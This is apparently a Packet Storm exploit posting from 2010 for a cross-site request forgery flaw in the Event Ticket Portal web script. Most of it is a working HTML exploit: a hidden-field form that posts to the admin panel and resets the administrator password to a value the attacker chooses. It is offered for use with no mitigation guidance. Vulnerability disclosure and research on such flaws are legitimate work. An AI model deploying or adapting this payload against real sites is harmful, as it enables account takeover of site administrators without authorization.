Event Ticket Portal Script suffers from a cross site request forgery vulnerability.
88ebc39cf565b45d4b8222b5709f3c325f45d3f584c1cf6c11821b3c7cac129e===========================================================
Event Ticket PORTAL <= Admin Password Change (CSRF) Exploit
===========================================================
~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Event Ticket PORTAL
|~Price : 149 Euro
|~Version : N/A
|~Software: http://www.tourismscripts.com
|~Vulnerability Style : CSRF
|~Vulnerability Dir : /admin
|~Google Keyword : N/A
|[~]Date : "18.10.2010"
|[~]Tested on : (L):Vista (R):Demo
~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#########################################################
the target can be changed according to
<form method="post" action="http://VICTIM/admin/admin.php">
########################################################
~~~~~~~~ Explotation| Exploit.HTML ~~~~~~~~~~~
========(CSRF) Html Exploit=========
<h3>Event Ticket PORTAL - Admin Password Chage (CSRF) Exploited by KnocKout</h3>
<table>
<tr>
<form method="post" action="http://server/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>
</table>
========(CSRF) Html Exploit=========
GoodLUCK.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed